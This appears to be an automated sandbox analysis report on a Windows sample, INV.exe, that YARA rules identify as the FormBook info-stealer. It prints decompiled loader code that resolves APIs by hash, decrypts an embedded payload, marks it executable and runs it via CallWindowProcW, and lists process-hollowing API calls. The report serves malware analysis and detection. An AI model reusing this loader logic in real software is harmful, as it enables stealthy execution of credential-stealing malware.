                                      KERNEL32.dll  EnumCalendarInfoExA, SetCalendarInfoW, VirtualProtect, CloseHandle, WriteConsoleW, SetFilePointerEx, SetStdHandle, GetConsoleMode, GetConsoleCP, FlushFileBuffers, lstrcpyA, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, GetTimeFormatW, GetDateFormatW, HeapSize, GetStringTypeW, HeapReAlloc, HeapAlloc, WaitForSingleObjectEx, EnumCalendarInfoW, CreateDirectoryW, EnumSystemLocalesW, GlobalFix, OutputDebugStringW, RtlUnwind, LoadLibraryExW, FreeLibrary, GetCommandLineA, GetLastError, SetLastError, GetCurrentThread, GetCurrentThreadId, EncodePointer, DecodePointer, ExitProcess, GetModuleHandleExW, GetProcAddress, AreFileApisANSI, MultiByteToWideChar, WideCharToMultiByte, GetProcessHeap, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, GetModuleFileNameA, WriteFile, GetModuleFileNameW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, CreateEventW, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetTickCount, GetModuleHandleW, CreateSemaphoreW, EnterCriticalSection, LeaveCriticalSection, FatalAppExitA, HeapFree, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, IsDebuggerPresent, IsProcessorFeaturePresent, SetConsoleCtrlHandler, CreateFileW
                                      MPR.dll       WNetDisconnectDialog1W, WNetGetResourceParentW, WNetGetNetworkInformationW, WNetGetResourceInformationW, WNetAddConnection3A
                                      MSACM32.dll   acmFilterTagEnumA, acmDriverEnum, acmFormatChooseW, acmStreamMessage, acmFilterEnumA, acmFormatEnumW, acmDriverDetailsW, acmFormatSuggest
                                      loadperf.dll  LoadPerfCounterTextStringsW, UnloadPerfCounterTextStringsA, LoadPerfCounterTextStringsA
                                      GDI32.dll     UnrealizeObject, GetGlyphOutline, GetCharABCWidthsFloatW, GetNearestColor
                                      WINSPOOL.DRV  StartDocPrinterW, SetPortW, DEVICECAPABILITIES

                                      Possible Origin

                                      Language of compilation system  Country where language is spoken  Map
                                      English                         United States

                                      Network Behavior

                                      Network Port Distribution

                                      UDP Packets

                                      Code Manipulations

                                      System Behavior

                                      General

                                      Start time:02:05:59
                                      Start date:27/11/2020
                                      Path:C:\Users\user\Desktop\INV.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\INV.exe'
                                      Imagebase:0x1060000
                                      File size:394240 bytes
                                      MD5 hash:83259CB82642666503278233421C306D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      General

                                      Start time:02:05:59
                                      Start date:27/11/2020
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff724c50000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:02:06:00
                                      Start date:27/11/2020
                                      Path:C:\Users\user\Desktop\INV.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Users\user\Desktop\INV.exe
                                      Imagebase:0x1060000
                                      File size:394240 bytes
                                      MD5 hash:83259CB82642666503278233421C306D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low

                                      General

                                      Start time:02:06:00
                                      Start date:27/11/2020
                                      Path:C:\Users\user\Desktop\INV.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\INV.exe
                                      Imagebase:0x1060000
                                      File size:394240 bytes
                                      MD5 hash:83259CB82642666503278233421C306D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      General

                                      Start time:02:06:01
                                      Start date:27/11/2020
                                      Path:C:\Users\user\Desktop\INV.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\INV.exe
                                      Imagebase:0x1060000
                                      File size:394240 bytes
                                      MD5 hash:83259CB82642666503278233421C306D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.726953085.0000000000BEA000.00000004.00000020.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.726953085.0000000000BEA000.00000004.00000020.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.726953085.0000000000BEA000.00000004.00000020.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.727594067.0000000003955000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.727594067.0000000003955000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.727594067.0000000003955000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      General

                                      Start time:02:06:04
                                      Start date:27/11/2020
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2856 -s 872
                                      Imagebase:0x9d0000
                                      File size:434592 bytes
                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Reputation:high

                                      Disassembly

                                      Code Analysis

                                        Executed Functions

                                        C-Code - Quality: 38%
                                        			E01077800(void* __ebx, void* __esi, void* __eflags) {
                                        				intOrPtr _v8;
                                        				char _v12;
                                        				long _v16;
                                        				char _v18;
                                        				short _v20;
                                        				intOrPtr _v24;
                                        				char _v28;
                                        				char _v30;
                                        				short _v32;
                                        				intOrPtr _v36;
                                        				char _v40;
                                        				void* __edi;
                                        				intOrPtr* _t40;
                                        				intOrPtr* _t43;
                                        				void* _t44;
                                        				intOrPtr* _t48;
                                        				void* _t49;
                                        				signed char _t50;
                                        				intOrPtr* _t56;
                                        				void* _t85;
                                        				void* _t87;
                                        
                                        				_v28 = 0x72657355;
                                        				_v24 = 0x642e3233;
                                        				_v20 = 0x6c6c;
                                        				_v18 = 0;
                                        				_v40 = 0x72637052;
                                        				_v36 = 0x642e3474;
                                        				_v32 = 0x6c6c;
                                        				_v30 = 0;
                                        				_t56 = E01077950( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x8ca9ef6c);
                                        				_t12 =  &_v28; // 0x72657355
                                        				_v8 = E01077950( *_t56(_t12, _t85, __esi, __ebx), 0xb4c47f55);
                                        				_t40 = E01077950( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x5790f301);
                                        				_t17 =  &_v28; // 0x72657355
                                        				_t43 = E01077950( *_t56(_t17), 0xc7e6f44f);
                                        				_t44 =  *_t40(0); // executed
                                        				 *_t43(_t44);
                                        				_t18 =  &_v40; // 0x72637052
                                        				_t48 = E01077950( *_t56(_t18), 0x958d1c17);
                                        				_t49 =  *_t48(2, 0, 1, 0,  &_v12); // executed
                                        				_t87 = 0;
                                        				if(_t49 != 0 && _t49 == 0x57) {
                                        					_t50 = 0;
                                        					do {
                                        						_t20 = 0x107f0d0 + _t50; // 0x17e1e9
                                        						asm("rol dl, 0x2");
                                        						asm("ror dl, 0x3");
                                        						 *(0x107f0d0 + _t50) = (_t50 + _t50 - ((( ~( !( *_t20) ^ 0x00000097) - 0x00000027 ^ _t50) - _t50 ^ _t50) - 0x00000060 ^ _t50) ^ _t50) - 0x00000052 ^ _t50;
                                        						_t50 = _t50 + 1;
                                        					} while (_t50 < 0x1e05);
                                        					VirtualProtect(0x107f0d0, 0x1e05, 0x40,  &_v16); // executed
                                        					CallWindowProcW(0x107f0d0, 0x1080ed8, 0, 0, 0);
                                        					return E01077D10(_t87);
                                        				}
                                        				return _t49;
                                        			}

























                                        APIs
                                        • GetConsoleWindow.KERNELBASE(00000000), ref: 010778A6
                                        • RpcMgmtEpEltInqBegin.RPCRT4(00000000,00000002,00000000,00000001,00000000,?), ref: 010778CB
                                        • VirtualProtect.KERNELBASE(0107F0D0,00001E05,00000040,?), ref: 0107792C
                                        • CallWindowProcW.USER32(0107F0D0,01080ED8,00000000,00000000,00000000), ref: 01077942
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: Window$BeginCallConsoleMgmtProcProtectVirtual
                                        • String ID: Rpcrt4.dllUser32.dll$User32.dll
                                        • API String ID: 546183053-2494872352
                                        • Opcode ID: 438720ef081869dd006ec030dc15019bc7c79eded65c5e3209b18a18c5344be2
                                        • Instruction ID: 154657245df555d4070759374ac87797fa3ff0e4785defbcb9ca7b1ac9af44e5
                                        • Opcode Fuzzy Hash: 438720ef081869dd006ec030dc15019bc7c79eded65c5e3209b18a18c5344be2
                                        • Instruction Fuzzy Hash: DF31FF71B402099FDB01DBB9C88ABDFB7E5EF49710F100094E644EB3A2DA75D9048798
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 86%
                                        			E01061DCF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                        				signed int _t82;
                                        				signed int _t86;
                                        				long _t90;
                                        				void* _t91;
                                        				signed int _t94;
                                        				signed int _t98;
                                        				signed int _t99;
                                        				signed char _t103;
                                        				signed int _t105;
                                        				intOrPtr _t106;
                                        				intOrPtr* _t109;
                                        				signed char _t111;
                                        				long _t119;
                                        				intOrPtr _t129;
                                        				signed int _t133;
                                        				void* _t135;
                                        				signed int _t138;
                                        				void** _t139;
                                        				signed int _t141;
                                        				signed int _t142;
                                        				signed int _t143;
                                        				signed int _t147;
                                        				signed int _t149;
                                        				void* _t150;
                                        				signed int _t154;
                                        				void* _t155;
                                        				void* _t156;
                                        
                                        				_push(0x64);
                                        				_push(0x107cd50);
                                        				E010627F0(__ebx, __edi, __esi);
                                        				E01063117(0xb);
                                        				 *((intOrPtr*)(_t155 - 4)) = 0;
                                        				_push(0x40);
                                        				_t141 = 0x20;
                                        				_push(_t141);
                                        				_t82 = E010632EE();
                                        				_t133 = _t82;
                                        				 *(_t155 - 0x24) = _t133;
                                        				if(_t133 != 0) {
                                        					 *0x10bfd20 = _t82;
                                        					 *0x10c1b28 = _t141;
                                        					while(1) {
                                        						__eflags = _t133 - 0x800 + _t82;
                                        						if(_t133 >= 0x800 + _t82) {
                                        							break;
                                        						}
                                        						 *((short*)(_t133 + 4)) = 0xa00;
                                        						 *_t133 =  *_t133 | 0xffffffff;
                                        						 *((intOrPtr*)(_t133 + 8)) = 0;
                                        						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x00000080;
                                        						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x0000007f;
                                        						 *((short*)(_t133 + 0x25)) = 0xa0a;
                                        						 *((intOrPtr*)(_t133 + 0x38)) = 0;
                                        						 *((char*)(_t133 + 0x34)) = 0;
                                        						_t133 = _t133 + 0x40;
                                        						 *(_t155 - 0x24) = _t133;
                                        						_t82 =  *0x10bfd20; // 0x12df4b0
                                        					}
                                        					GetStartupInfoW(_t155 - 0x74);
                                        					__eflags =  *((short*)(_t155 - 0x42));
                                        					if( *((short*)(_t155 - 0x42)) == 0) {
                                        						L27:
                                        						_t129 = 0xfffffffe;
                                        						L28:
                                        						_t142 = 0;
                                        						__eflags = 0;
                                        						while(1) {
                                        							 *(_t155 - 0x2c) = _t142;
                                        							__eflags = _t142 - 3;
                                        							if(_t142 >= 3) {
                                        								break;
                                        							}
                                        							_t147 = (_t142 << 6) +  *0x10bfd20;
                                        							 *(_t155 - 0x24) = _t147;
                                        							__eflags =  *_t147 - 0xffffffff;
                                        							if( *_t147 == 0xffffffff) {
                                        								L33:
                                        								 *(_t147 + 4) = 0x81;
                                        								__eflags = _t142;
                                        								if(_t142 != 0) {
                                        									_t65 = _t142 - 1; // -1
                                        									asm("sbb eax, eax");
                                        									_t90 =  ~_t65 + 0xfffffff5;
                                        									__eflags = _t90;
                                        								} else {
                                        									_t90 = 0xfffffff6;
                                        								}
                                        								_t91 = GetStdHandle(_t90);
                                        								 *(_t155 - 0x1c) = _t91;
                                        								__eflags = _t91 - 0xffffffff;
                                        								if(_t91 == 0xffffffff) {
                                        									L45:
                                        									 *(_t147 + 4) =  *(_t147 + 4) | 0x00000040;
                                        									 *_t147 = _t129;
                                        									_t94 =  *0x10c1a80; // 0x12e04c0
                                        									__eflags = _t94;
                                        									if(_t94 != 0) {
                                        										 *((intOrPtr*)( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10)) = _t129;
                                        									}
                                        									goto L47;
                                        								} else {
                                        									__eflags = _t91;
                                        									if(_t91 == 0) {
                                        										goto L45;
                                        									}
                                        									_t98 = GetFileType(_t91); // executed
                                        									__eflags = _t98;
                                        									if(_t98 == 0) {
                                        										goto L45;
                                        									}
                                        									 *_t147 =  *(_t155 - 0x1c);
                                        									_t99 = _t98 & 0x000000ff;
                                        									__eflags = _t99 - 2;
                                        									if(_t99 != 2) {
                                        										__eflags = _t99 - 3;
                                        										if(_t99 != 3) {
                                        											L44:
                                        											_t71 = _t147 + 0xc; // -17562900
                                        											E01062D36(_t71, 0xfa0, 0);
                                        											_t156 = _t156 + 0xc;
                                        											 *((intOrPtr*)(_t147 + 8)) =  *((intOrPtr*)(_t147 + 8)) + 1;
                                        											L47:
                                        											_t142 = _t142 + 1;
                                        											continue;
                                        										}
                                        										_t103 =  *(_t147 + 4) | 0x00000008;
                                        										__eflags = _t103;
                                        										L43:
                                        										 *(_t147 + 4) = _t103;
                                        										goto L44;
                                        									}
                                        									_t103 =  *(_t147 + 4) | 0x00000040;
                                        									goto L43;
                                        								}
                                        							}
                                        							__eflags =  *_t147 - _t129;
                                        							if( *_t147 == _t129) {
                                        								goto L33;
                                        							}
                                        							 *(_t147 + 4) =  *(_t147 + 4) | 0x00000080;
                                        							goto L47;
                                        						}
                                        						 *((intOrPtr*)(_t155 - 4)) = _t129;
                                        						E0106207A();
                                        						_t86 = 0;
                                        						__eflags = 0;
                                        						L49:
                                        						return E01062835(_t86);
                                        					}
                                        					_t105 =  *(_t155 - 0x40);
                                        					__eflags = _t105;
                                        					if(_t105 == 0) {
                                        						goto L27;
                                        					}
                                        					_t135 =  *_t105;
                                        					 *(_t155 - 0x1c) = _t135;
                                        					_t106 = _t105 + 4;
                                        					 *((intOrPtr*)(_t155 - 0x28)) = _t106;
                                        					 *(_t155 - 0x20) = _t106 + _t135;
                                        					__eflags = _t135 - 0x800;
                                        					if(_t135 >= 0x800) {
                                        						_t135 = 0x800;
                                        						 *(_t155 - 0x1c) = 0x800;
                                        					}
                                        					_t149 = 1;
                                        					__eflags = 1;
                                        					 *(_t155 - 0x30) = 1;
                                        					while(1) {
                                        						__eflags =  *0x10c1b28 - _t135; // 0x20
                                        						if(__eflags >= 0) {
                                        							break;
                                        						}
                                        						_t138 = E010632EE(_t141, 0x40);
                                        						 *(_t155 - 0x24) = _t138;
                                        						__eflags = _t138;
                                        						if(_t138 != 0) {
                                        							0x10bfd20[_t149] = _t138;
                                        							 *0x10c1b28 =  *0x10c1b28 + _t141;
                                        							__eflags =  *0x10c1b28;
                                        							while(1) {
                                        								__eflags = _t138 - 0x800 + 0x10bfd20[_t149];
                                        								if(_t138 >= 0x800 + 0x10bfd20[_t149]) {
                                        									break;
                                        								}
                                        								 *((short*)(_t138 + 4)) = 0xa00;
                                        								 *_t138 =  *_t138 | 0xffffffff;
                                        								 *((intOrPtr*)(_t138 + 8)) = 0;
                                        								 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
                                        								 *((short*)(_t138 + 0x25)) = 0xa0a;
                                        								 *((intOrPtr*)(_t138 + 0x38)) = 0;
                                        								 *((char*)(_t138 + 0x34)) = 0;
                                        								_t138 = _t138 + 0x40;
                                        								 *(_t155 - 0x24) = _t138;
                                        							}
                                        							_t149 = _t149 + 1;
                                        							 *(_t155 - 0x30) = _t149;
                                        							_t135 =  *(_t155 - 0x1c);
                                        							continue;
                                        						}
                                        						_t135 =  *0x10c1b28; // 0x20
                                        						 *(_t155 - 0x1c) = _t135;
                                        						break;
                                        					}
                                        					_t143 = 0;
                                        					 *(_t155 - 0x2c) = 0;
                                        					_t129 = 0xfffffffe;
                                        					_t109 =  *((intOrPtr*)(_t155 - 0x28));
                                        					_t139 =  *(_t155 - 0x20);
                                        					while(1) {
                                        						__eflags = _t143 - _t135;
                                        						if(_t143 >= _t135) {
                                        							goto L28;
                                        						}
                                        						_t150 =  *_t139;
                                        						__eflags = _t150 - 0xffffffff;
                                        						if(_t150 == 0xffffffff) {
                                        							L22:
                                        							_t143 = _t143 + 1;
                                        							 *(_t155 - 0x2c) = _t143;
                                        							_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
                                        							 *((intOrPtr*)(_t155 - 0x28)) = _t109;
                                        							_t139 =  &(_t139[1]);
                                        							 *(_t155 - 0x20) = _t139;
                                        							continue;
                                        						}
                                        						__eflags = _t150 - _t129;
                                        						if(_t150 == _t129) {
                                        							goto L22;
                                        						}
                                        						_t111 =  *_t109;
                                        						__eflags = _t111 & 0x00000001;
                                        						if((_t111 & 0x00000001) == 0) {
                                        							goto L22;
                                        						}
                                        						__eflags = _t111 & 0x00000008;
                                        						if((_t111 & 0x00000008) != 0) {
                                        							L20:
                                        							_t154 = ((_t143 & 0x0000001f) << 6) + 0x10bfd20[_t143 >> 5];
                                        							 *(_t155 - 0x24) = _t154;
                                        							 *_t154 =  *_t139;
                                        							 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
                                        							_t37 = _t154 + 0xc; // 0xd
                                        							E01062D36(_t37, 0xfa0, 0);
                                        							_t156 = _t156 + 0xc;
                                        							_t38 = _t154 + 8;
                                        							 *_t38 =  *(_t154 + 8) + 1;
                                        							__eflags =  *_t38;
                                        							_t139 =  *(_t155 - 0x20);
                                        							L21:
                                        							_t135 =  *(_t155 - 0x1c);
                                        							goto L22;
                                        						}
                                        						_t119 = GetFileType(_t150);
                                        						_t139 =  *(_t155 - 0x20);
                                        						__eflags = _t119;
                                        						if(_t119 == 0) {
                                        							goto L21;
                                        						}
                                        						goto L20;
                                        					}
                                        					goto L28;
                                        				}
                                        				_t86 = E01064E90(_t155, 0x107ece0, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
                                        				goto L49;
                                        			}






























                                        0x00000000
                                        0x00000000
                                        0x01061ee0
                                        0x01061ee2
                                        0x01061ee5
                                        0x01061f42
                                        0x01061f42
                                        0x01061f43
                                        0x01061f49
                                        0x01061f4a
                                        0x01061f4d
                                        0x01061f50
                                        0x00000000
                                        0x01061f50
                                        0x01061ee7
                                        0x01061ee9
                                        0x00000000
                                        0x00000000
                                        0x01061eeb
                                        0x01061eed
                                        0x01061eef
                                        0x00000000
                                        0x00000000
                                        0x01061ef1
                                        0x01061ef3
                                        0x01061f03
                                        0x01061f10
                                        0x01061f17
                                        0x01061f1c
                                        0x01061f23
                                        0x01061f2d
                                        0x01061f31
                                        0x01061f36
                                        0x01061f39
                                        0x01061f39
                                        0x01061f39
                                        0x01061f3c
                                        0x01061f3f
                                        0x01061f3f
                                        0x00000000
                                        0x01061f3f
                                        0x01061ef6
                                        0x01061efc
                                        0x01061eff
                                        0x01061f01
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x01061f01
                                        0x00000000
                                        0x01061ed8
                                        0x01061e11
                                        0x00000000

                                        APIs
                                        • __lock.LIBCMT ref: 01061DDD
                                          • Part of subcall function 01063117: __mtinitlocknum.LIBCMT ref: 01063129
                                          • Part of subcall function 01063117: __amsg_exit.LIBCMT ref: 01063135
                                          • Part of subcall function 01063117: EnterCriticalSection.KERNEL32(00000000,?,010616CE,0000000D), ref: 01063142
                                        • __calloc_crt.LIBCMT ref: 01061DEE
                                          • Part of subcall function 010632EE: __calloc_impl.LIBCMT ref: 010632FD
                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 01061E09
                                        • GetStartupInfoW.KERNEL32(?,0107CD50,00000064,01061146,0107CCC0,00000014), ref: 01061E62
                                        • __calloc_crt.LIBCMT ref: 01061EAD
                                        • GetFileType.KERNEL32(00000001), ref: 01061EF6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__amsg_exit__calloc_impl__lock__mtinitlocknum
                                        • String ID:
                                        • API String ID: 2621518576-0
                                        • Opcode ID: f481119ee6157c0910e0551016915561872da90923d11c97671061e2f16f1e82
                                        • Instruction ID: 4220f4b57403b46eff6df1509059b8c0391ed9c9b4e7ec4f1c3e11ebc24afd61
                                        • Opcode Fuzzy Hash: f481119ee6157c0910e0551016915561872da90923d11c97671061e2f16f1e82
                                        • Instruction Fuzzy Hash: 1F81B371D04246CFDB24CF68C8405ADBBF9BF59320B2442AEE4E6AB391D7399802CB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 0107F73D
                                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,01080190,81AF6D4E,0107FCD3), ref: 0107F767
                                        • ReadFile.KERNELBASE(00000000,00000000,0107FCD3,?,00000000,?,?,?,?,?,?,?,?,?,01080190,81AF6D4E), ref: 0107F77E
                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,01080190,81AF6D4E,0107FCD3), ref: 0107F7A0
                                        • FindCloseChangeNotification.KERNELBASE(81AF6D4E,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,01080190), ref: 0107F812
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00000000,00000000,00000000,?), ref: 0107F81D
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,01080190,81AF6D4E,0107FCD3,00000000), ref: 0107F868
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                        • String ID:
                                        • API String ID: 656311269-0
                                        • Opcode ID: 97b910f21815d8457922ed8ca2e505dd5b440e900b165ea24fa558e1bdbe992b
                                        • Instruction ID: e1c66225a2a266d1f0fcb884e952f3013b77754b6f05dd7527a641889c235f78
                                        • Opcode Fuzzy Hash: 97b910f21815d8457922ed8ca2e505dd5b440e900b165ea24fa558e1bdbe992b
                                        • Instruction Fuzzy Hash: 64518171E0532AABDB509FB8CC84FAEBBB8EF18710F144469F591F7280D67099018768
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 01080B44
                                        • ExitProcess.KERNEL32(00000000), ref: 01080B4D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CreateExit
                                        • String ID: 5113b86b37df4b07ae03213fe012da79$D
                                        • API String ID: 126409537-89965315
                                        • Opcode ID: b68e6e79c134320777226aec7a8f657a50630cd056bbb628e4f733a692dc0c4b
                                        • Instruction ID: 333118b19e4f91373b82d0cc3f80f84bfaae992b7b7fa1fa7313d46b8408ec30
                                        • Opcode Fuzzy Hash: b68e6e79c134320777226aec7a8f657a50630cd056bbb628e4f733a692dc0c4b
                                        • Instruction Fuzzy Hash: 50916E30D1838CEEEF12DBE8D845BEDBBB5AF14704F10409AE584BA291D3B50A48DB65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,08000004,00000000,00000000,?,?), ref: 0107F206
                                        • GetThreadContext.KERNELBASE(?,?), ref: 0107F225
                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0107F245
                                        • TerminateProcess.KERNELBASE(00000000,00000000), ref: 0107F455
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
